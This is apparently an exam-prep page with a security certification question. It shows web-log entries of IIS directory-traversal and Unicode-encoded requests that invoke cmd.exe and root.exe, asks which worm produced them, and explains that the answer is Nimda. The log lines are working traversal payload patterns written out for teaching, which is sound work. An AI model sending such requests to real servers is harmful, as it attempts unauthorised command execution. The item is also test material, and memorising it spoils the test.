PrepAway - Latest Free Exam Questions & Answers

What caused this?

You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.

What caused this?

GET /scripts/root.exe?/c+dir

GET /MSADC/root.exe?/c+dir

GET /c/winnt/system32/cmd.exe?/c+dir

GET /d/winnt/system32/cmd.exe?/c+dir

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir

GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir

GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

PrepAway - Latest Free Exam Questions & Answers

A.
The Morris worm

B.
The PIF virus

C.
Trinoo

D.
Nimda

E.
Code Red

F.
Ping of Death

Explanation:
The Nimda worm modifies all web content files it finds. As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby, infecting the browsing system. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines and allow intruders the ability to execute arbitrary commands within the Local System security context on machines running the unpatched versions of IIS.


Leave a Reply